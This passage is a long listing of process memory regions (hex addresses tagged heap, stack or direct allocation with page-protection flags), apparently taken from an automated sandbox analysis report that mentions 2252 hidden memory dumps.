page read and write
1A228630000
heap
page read and write
1E893C02000
heap
page read and write
1E893B67000
heap
page read and write
1E894815000
heap
page read and write
161789E5000
heap
page read and write
2D0F51FC000
heap
page read and write
1E893B5D000
heap
page read and write
1E893A4E000
heap
page read and write
1E8946AD000
heap
page read and write
1E8936E7000
heap
page read and write
1E893CE5000
heap
page read and write
1E894873000
heap
page read and write
1E893A52000
heap
page read and write
1E8946F2000
heap
page read and write
1E8936A0000
heap
page read and write
1E8947BE000
heap
page read and write
1E893B5A000
heap
page read and write
169178D9000
heap
page read and write
1E894C65000
heap
page read and write
1E89351B000
heap
page read and write
24BCD652000
heap
page read and write
1E895C60000
direct allocation
page read and write
169172B0000
heap
page read and write
1E895D60000
direct allocation
page read and write
1E893B1D000
heap
page read and write
161789DC000
heap
page read and write
1E8935FA000
heap
page read and write
1E894E70000
direct allocation
page read and write
1E893593000
heap
page read and write
1E893604000
heap
page read and write
1E893355000
heap
page read and write
1E8946AD000
heap
page read and write
1E894B36000
heap
page read and write
169170A0000
heap
page read and write
1E8933C0000
heap
page read and write
1E893633000
heap
page read and write
1E893AFA000
heap
page read and write
1E893513000
heap
page read and write
20BBA15B000
heap
page read and write
1E89336B000
heap
page read and write
1E894613000
heap
page read and write
1E893A94000
heap
page read and write
1E8933B7000
heap
page read and write
1E893B18000
heap
page read and write
1E893B5A000
heap
page read and write
1E895D60000
direct allocation
page read and write
7E204FF000
stack
page read and write
24BCD659000
heap
page read and write
1E893C10000
heap
page read and write
24BCD65F000
heap
page read and write
2D0F5090000
heap
page read and write
1E894CFA000
heap
page read and write
1E893B79000
heap
page read and write
24BCD652000
heap
page read and write
1E893591000
heap
page read and write
1E8914E4000
heap
page read and write
1E895370000
direct allocation
page read and write
1E894815000
heap
page read and write
1E893AEF000
heap
page read and write
1E894BDE000
heap
page read and write
242774E0000
heap
page read and write
1E893B0D000
heap
page read and write
1E894A79000
heap
page read and write
1E89466A000
heap
page read and write
1E89392A000
heap
page read and write
136CCBB0000
heap
page read and write
1E8945D1000
heap
page read and write
1E8935DC000
heap
page read and write
14672AF0000
heap
page read and write
1E893995000
heap
page read and write
16917105000
heap
page read and write
172FF7F000
stack
page read and write
169178D9000
heap
page read and write
169178BA000
heap
page read and write
1E893572000
heap
page read and write
1E8935FF000
heap
page read and write
242776C0000
heap
page read and write
1E893BBD000
heap
page read and write
1E8936AD000
heap
page read and write
1E895D60000
direct allocation
page read and write
1E8935A9000
heap
page read and write
1E893542000
heap
page read and write
1A228730000
heap
page read and write
1E8945FF000
heap
page read and write
1E893A0D000
heap
page read and write
1E895D60000
direct allocation
page read and write
1617A9C4000
heap
page read and write
1E893698000
heap
page read and write
1E5E4FF000
stack
page read and write
1E894807000
heap
page read and write
1E8939B7000
heap
page read and write
1E892FA0000
heap
page read and write
1617A9BE000
heap
page read and write
1E893661000
heap
page read and write
1E8947B2000
heap
page read and write
1E895D60000
direct allocation
page read and write
1E893301000
heap
page read and write
1E893C32000
heap
page read and write
1E8933D5000
heap
page read and write
1E89354C000
heap
page read and write
1E894BC1000
heap
page read and write
1E893C02000
heap
page read and write
1E893511000
heap
page read and write
235FD690000
heap
page read and write
1E8947D2000
heap
page read and write
1E893AE8000
heap
page read and write
20BBA150000
heap
page read and write
1E893BFF000
heap
page read and write
1E894B5E000
heap
page read and write
1E8945A4000
heap
page read and write
1E8936A3000
heap
page read and write
1E893B75000
heap
page read and write
1E89151C000
heap
page read and write
1E894B94000
heap
page read and write
24BCD652000
heap
page read and write
1E893C2F000
heap
page read and write
1E893984000
heap
page read and write
1E893BBA000
heap
page read and write
256213E0000
heap
page read and write
1E89145F000
heap
page read and write
1E8935B3000
heap
page read and write
1E893A24000
heap
page read and write
2894F2F7000
heap
page read and write
161789D5000
heap
page read and write
1E893A11000
heap
page read and write
169172D0000
trusted library allocation
page read and write
82CDD7E000
stack
page read and write
1E893369000
heap
page read and write
1E893547000
heap
page read and write
169170FB000
heap
page read and write
1E893C50000
heap
page read and write
1E893B67000
heap
page read and write
21074980000
heap
page read and write
1E894CBD000
heap
page read and write
24BCD652000
heap
page read and write
1E893B79000
heap
page read and write
1E893538000
heap
page read and write
1E893B75000
heap
page read and write
1E893A09000
heap
page read and write
14672CA0000
heap
page read and write
1E893A56000
heap
page read and write
1E8947E7000
heap
page read and write
1E896635000
heap
page read and write
16917410000
heap
page read and write
1E893505000
heap
page read and write
169170B3000
heap
page read and write
1E893688000
heap
page read and write
1E893C94000
heap
page read and write
1EA7FA07000
heap
page read and write
1E8939F7000
heap
page read and write
1E89334C000
heap
page read and write
1E8947E8000
heap
page read and write
1E89336E000
heap
page read and write
1E777C47000
heap
page read and write
24BCD652000
heap
page read and write
1A228520000
heap
page read and write
1E891420000
direct allocation
page read and write
1E8947EE000
heap
page read and write
1E893562000
heap
page read and write
1E893B3B000
heap
page read and write
172FFFE000
stack
page read and write
1E895D60000
direct allocation
page read and write
2D0F51EE000
heap
page read and write
1E8935C7000
heap
page read and write
1E89154C000
heap
page read and write
1E8913B0000
heap
page read and write
1E8937F0000
direct allocation
page read and write
1E8939DC000
heap
page read and write
1E8945D1000
heap
page read and write
1E89358F000
heap
page read and write
1E8947B2000
heap
page read and write
1691914E000
heap
page read and write
1E893B70000
heap
page read and write
1E893B42000
heap
page read and write
1EA7FA31000
heap
page read and write
1E8947C3000
heap
page read and write
1E893B83000
heap
page read and write
24BCD652000
heap
page read and write
1E893A4D000
heap
page read and write
1E893C40000
heap
page read and write
1E89331D000
heap
page read and write
1EA7F940000
heap
page read and write
1E893B2A000
heap
page read and write
24BCD652000
heap
page read and write
1E893663000
heap
page read and write
1E894665000
heap
page read and write
9C590FF000
stack
page read and write
9C58FFF000
unkown
page read and write
16917108000
heap
page read and write
1E8936B4000
heap
page read and write
1E893B3A000
heap
page read and write
1E89462B000
heap
page read and write
1E89337D000
heap
page read and write
2D0F51A7000
heap
page read and write
1E8948E2000
heap
page read and write
16917110000
heap
page read and write
1E89362D000
heap
page read and write
1E893937000
heap
page read and write
1E893B3E000
heap
page read and write
24BCD65F000
heap
page read and write
2894F594000
heap
page read and write
1E893A01000
heap
page read and write
1E89336D000
heap
page read and write
1E8933D3000
heap
page read and write
1E8936CB000
heap
page read and write
1E893672000
heap
page read and write
1E893989000
heap
page read and write
1617A9B4000
heap
page read and write
1E89338C000
heap
page read and write
2D0F5420000
heap
page read and write
1E893693000
heap
page read and write
161789E8000
heap
page read and write
1E893698000
heap
page read and write
1E89355A000
heap
page read and write
1617A9B3000
heap
page read and write
24BCD659000
heap
page read and write
1E893554000
heap
page read and write
24BCD659000
heap
page read and write
1E89154C000
heap
page read and write
1E895D60000
direct allocation
page read and write
1E895D60000
direct allocation
page read and write
1E895D70000
direct allocation
page read and write
1E8933DD000
heap
page read and write
1E895D60000
direct allocation
page read and write
E4710FF000
stack
page read and write
1E893B42000
heap
page read and write
1E893B91000
heap
page read and write
1E894CFB000
heap
page read and write
7FF7333BD000
unkown
page readonly
1E894570000
heap
page read and write
1E894703000
heap
page read and write
1E89338C000
heap
page read and write
1E893693000
heap
page read and write
1E893344000
heap
page read and write
24BCD5D0000
heap
page read and write
1E89462C000
heap
page read and write
24BCD65F000
heap
page read and write
1E895D60000
direct allocation
page read and write
1E894D07000
heap
page read and write
1E893B53000
heap
page read and write
1E893BAB000
heap
page read and write
1E893BFF000
heap
page read and write
1E895D60000
direct allocation
page read and write
24BCD652000
heap
page read and write
1E893332000
heap
page read and write
1E895D60000
direct allocation
page read and write
136CCF64000
heap
page read and write
1E893AFE000
heap
page read and write
1E8947E2000
heap
page read and write
1E8939EF000
heap
page read and write
1E894775000
heap
page read and write
1E8939B6000
heap
page read and write
1E894713000
heap
page read and write
1E89337B000
heap
page read and write
1E89359C000
heap
page read and write
1E8936CB000
heap
page read and write
1E893AFA000
heap
page read and write
16917100000
heap
page read and write
1E89398A000
heap
page read and write
161789C6000
heap
page read and write
1E8945BD000
heap
page read and write
1E894B69000
heap
page read and write
1E893B51000
heap
page read and write
1E893BC2000
heap
page read and write
1E894A90000
heap
page read and write
24BCD652000
heap
page read and write
24BCD652000
heap
page read and write
1E8935A0000
heap
page read and write
1691711A000
heap
page read and write
1E893377000
heap
page read and write
1E893362000
heap
page read and write
161789D5000
heap
page read and write
1E894638000
heap
page read and write
1E893928000
heap
page read and write
1E8914EB000
heap
page read and write
1CE755C0000
heap
page read and write
1E895D60000
direct allocation
page read and write
1E893AFE000
heap
page read and write
1E894B9A000
heap
page read and write
1E893A97000
heap
page read and write
14672880000
heap
page read and write
16917414000
heap
page read and write
1E8933E4000
heap
page read and write
1E8949EB000
heap
page read and write
1E8939B8000
heap
page read and write
1E8939FC000
heap
page read and write
1E893991000
heap
page read and write
1617911C000
heap
page read and write
1E8933B6000
heap
page read and write
1E8945FA000
heap
page read and write
1E893652000
heap
page read and write
1E893B0D000
heap
page read and write
1E894A12000
heap
page read and write
1E893591000
heap
page read and write
1E89393C000
heap
page read and write
24277502000
heap
page read and write
21074880000
heap
page read and write
1E893AFB000
heap
page read and write
24BCD652000
heap
page read and write
1E89360E000
heap
page read and write
16178B90000
heap
page read and write
1E893542000
heap
page read and write
2D0F51F0000
heap
page read and write
1E893B79000
heap
page read and write
1E891541000
heap
page read and write
1E8933B6000
heap
page read and write
1E893BE3000
heap
page read and write
1E893A2C000
heap
page read and write
1E893309000
heap
page read and write
24BCD659000
heap
page read and write
1E895D60000
direct allocation
page read and write
1E893AD9000
heap
page read and write
1E894C90000
heap
page read and write
24BCD659000
heap
page read and write
1E894696000
heap
page read and write
1E8936DF000
heap
page read and write
1E8947D1000
heap
page read and write
169170B7000
heap
page read and write
1E894BC2000
heap
page read and write
1E893CDE000
heap
page read and write
161789FD000
heap
page read and write
1E893B63000
heap
page read and write
1E89337B000
heap
page read and write
1E8945A0000
heap
page read and write
1E893C02000
heap
page read and write
24BCD652000
heap
page read and write
1E89355E000
heap
page read and write
24BCD650000
heap
page read and write
1E893C81000
heap
page read and write
1E8936E7000
heap
page read and write
1E8935A3000
heap
page read and write
20FCB1C4000
heap
page read and write
1E892DC0000
direct allocation
page read and write
There are 2252 hidden memdumps, click here to show them.